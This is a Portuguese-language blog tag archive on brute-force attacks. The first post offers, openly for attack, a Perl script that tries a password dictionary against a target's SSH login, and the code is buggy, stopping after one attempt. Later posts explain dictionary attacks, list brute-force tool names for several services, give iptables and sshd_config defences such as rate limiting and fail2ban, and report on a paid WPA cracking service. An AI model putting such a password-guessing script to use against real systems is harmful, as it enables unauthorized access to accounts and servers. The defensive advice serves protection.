Arquivos de Tags: Brute-force

Codigo-fonte Bruteforce.pl

Escrito por em 26 de Abril de 2010 1 comentário

Segue abaixo o source de um brute-force para atacar um ssh, escrito em perl.

#!/usr/bin/perl
system ("clear");
system ("cls");
system ("color 02");
print "\n\n";
sleep 1;

use strict();
use Net::SSH;

$host=$ARGV[0];
$user=$ARGV[1];
$passdict=$ARGV[2] || die "\n[+]Perl Usage: BruteSSH.pl host user dict\n";
print "\n\n";
$i = 1;
open (D,"<$passdict") or die "Dicionario nao encontrado\n";
while(<D>)
{
$try = $_;
chomp $try;

$t = my $ssh = Net::SSH::Perl->new($host,debug=>1,use_pty=>1);
$ssh->login($user, $try);
print "\n";
print "[+] Obtendo Pass";
print "\n";
print $i++ . ": Falha! - $try\n";

print "'$try - $i intentos";
last;
$t->close;
}
close(IN);

Ataques brute-force

Escrito por em 4 de Abril de 2010 2 comentários

Introdução

Este artigo visa apresentar o conceito por trás deste tipo de ataque. Brute-force pode ser traduzido como “força bruta” que faz total sentido ao seu uso, consiste em forçar a autentificação em determinado serviço na base da força bruta, tentando senha por senha até encontrar a senha certa.

Este tipo de ataque demanda bastante tempo, e sorte, o método e bastante simples ira testar todas as combinações de caracteres possíveis até obter a senha certa levando em conta a variação de senhas possíveis existentes, por exemplo uma tentativa de brute-force em um servidor de ftp, digamos que a senha do ftp seja do tipo $a@DF4O9%2K3) imagina só, o tempo que levaria para quebrar uma senha complexa como essa!

Além do grande tempo gasto nesses ataques, quase sempre os servidores estarão configurados para evitá-los, tornando bastante inviável esse ataque. Por causa da demorar em ir tentando senha/login por senha/login os ataques costumam utilizar ataques de dicionários, que utilizam arquivos que contenha strings(palavras) de possíveis senhas que serão usadas para obter acesso ao serviço, alguma das palavras pode vir a funcionar ou não.

Ferramentas para ataques brute-force

Segue abaixo uma lista com diversas ferramentas de brute-force, ambas escritas em python.

smtpbrute.py
ftpbrute.py
imapbrute.py
nntpbrute.py
snmp_brute.py
sshbrute.py
telnetbrute.py

Evitando brute-force

Não é difícil evitar um ataque brute-force, existem diversas configurações que lhe fornecem proteção contra esse tipo de ataque, é bastante comum os administradores de sistemas usarem no iptables:

#iptables -A INPUT -p tcp -s $IPDEORIGEM -d $IPSERVER --dport ssh -j ACCEPT
#iptables -A INPUT -m state --state ESTABLISHED -j ACCEPT
#iptables -A INPUT -p tcp --dport ssh -m recent --update --seconds 180 -j DROP
#iptables -A INPUT -p tcp --dport ssh --tcp-flags syn,ack,rst syn -m recent --set -j ACCEPT

No ssh costumam usar essa configuração no sshd_config:

MaxStartups 5:50:10

Em conjunto da mudança da porta padrão(que a porta 22) para outra qualquer, que já melhora bastante a segurança, também e comum o uso de ferramentas como BFD (Brute Force Detect) ou Fail2ban. Limitar o inicio das sessões SYN, no iptables pode ser feito da seguinte forma:

#iptables -A INPUT -m state --state ESTABLISHED -j ACCEPT
#iptables -A INPUT -p tcp --dport ssh -m recent --update --seconds 120 -j DROP
#iptables -A INPUT -p tcp --dport ssh --tcp-flags syn,ack,rst syn -m recent --set -j ACCEPT

Também não podemos esquecer de utilizar senhas seguras nos seus servidores, senhas com caracteres especiais, letras maiúsculas e minúsculas, números e um comprimento de pelo menos 14 caracteres. Sempre monitorar os logs procurando por tentativas de login que falharam muitas vezes.

Links:

Instalando fail2ban
Instalando block hosts
Instalando BFD
Artigo da CERT defesa contra força-bruta.

[]‘s

Novo aplicativo para quebrar senhas de redes Wi-Fi

Escrito por em 9 de Dezembro de 2009 1 comentário

Pesquisadores desenvolveram uma nova ferramenta para testes de segurança que usa técnica de força bruta e testa milhões de palavras em busca das senhas compatíveis, usando um sistema distribuído com centenas de computadores, num arranjo de “cloud computing”.

O serviço abrevia drasticamente o tempo gasto para se descobrir uma senha, que de vários dias passa a alguns minutos.

A ferramenta chamada de WPA Cracker faz uso do poder de processamento de 400 computadores. O serviço é pago e existem dois tipos de pesquisas de senhas.

O primeiro custa US$ 34 e varre todo o dicionário de 135 milhões de palavras em 20 minutos. O segundo usa apenas 50% da capacidade computacional do sistema distribuído e custa US$ 17. A pesquisa completa, neste caso, pode demorar 40 minutos.

Se em vez de 400 computadores em um sistema distribuído fosse usado um único PC, mesmo que equipado com um processador poderoso como o Intel Core i7, o tempo mínimo para quebrar a senha seria de cinco dias ou mais (bastante tempo).
A ferramenta foi desenvolvida para aumentar a velocidade de auditoria para testes de penetração em redes WPA e o serviço funciona contra os sistemas Wi-Fi com criptografia WPA e WPA2, desde que estes possuam autenticação baseada em Pre-Shared Keys (PSK).

Nas chaves Wi-Fi que usam a tecnologia de criptografia WPA, as senhas devem possuir no mínimo oito caracteres e as entradas podem usar uma variedade enorme de palavras e frases.

Para desenvolver a ferramenta, os especialistas realizaram uma pesquisa de termos específicos usados por quem administra ou configura roteadores Wi-Fi. Na lista há palavras redigidas com o linguajar “leet” (por exemplo, h4ck3rzz) e expressões comuns usadas por técnicos que acabam virando senhas.

Site da ferramenta e para mais informações

[]‘s

Pagina 1 of 11
SEO Powered by Platinum SEO from Techblissonline